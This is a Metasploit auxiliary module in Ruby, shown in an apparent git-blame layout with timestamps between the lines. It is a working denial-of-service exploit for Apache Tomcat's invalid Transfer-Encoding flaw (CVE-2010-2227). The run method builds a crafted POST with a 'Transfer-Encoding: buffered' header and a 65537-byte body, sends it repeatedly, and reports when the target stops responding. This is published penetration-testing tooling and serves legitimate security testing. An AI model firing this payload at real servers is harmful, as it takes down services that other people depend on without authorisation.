2011-01-25 00:11:41 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-01-25 00:11:41 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Dos
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
|
|
|
|
'Description' => %q{
|
|
|
|
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not
|
|
|
|
properly handle an invalid Transfer-Encoding header, which allows remote attackers
|
|
|
|
to cause a denial of service (application outage) or obtain sensitive information
|
|
|
|
via a crafted header that interferes with "recycling of a buffer."
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
2015-04-03 11:12:23 +00:00
|
|
|
'Steve Jones', # original discoverer
|
|
|
|
'Hoagie <andi[at]void.at>', # original public exploit
|
|
|
|
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2010-2227' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '66319' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'BID', '41544' ]
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jul 09 2010'))
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8000),
|
|
|
|
OptInt.new('RLIMIT', [ true, "Number of requests to send", 25])
|
|
|
|
], self.class)
|
|
|
|
end
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
for x in 1..datastore['RLIMIT']
|
|
|
|
begin
|
|
|
|
connect
|
|
|
|
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sploit = "POST / HTTP/1.1\r\n"
|
|
|
|
sploit << "Host: " + rhost + "\r\n"
|
|
|
|
sploit << "Transfer-Encoding: buffered\r\n"
|
|
|
|
sploit << "Content-Length: 65537\r\n\r\n"
|
|
|
|
sploit << Rex::Text.rand_text_alpha(1) * 65537
|
2011-01-25 00:11:41 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sock.put(sploit + "\r\n\r\n")
|
|
|
|
disconnect
|
2011-11-20 02:12:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("DoS packet unsuccessful.")
|
|
|
|
rescue ::Rex::ConnectionRefused
|
|
|
|
print_status("Unable to connect to #{rhost}:#{rport}.")
|
|
|
|
rescue ::Errno::ECONNRESET
|
|
|
|
print_status("DoS packet successful. #{rhost} not responding.")
|
|
|
|
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_status("Couldn't connect to #{rhost}:#{rport}")
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-01-25 00:11:41 +00:00
|
|
|
end
|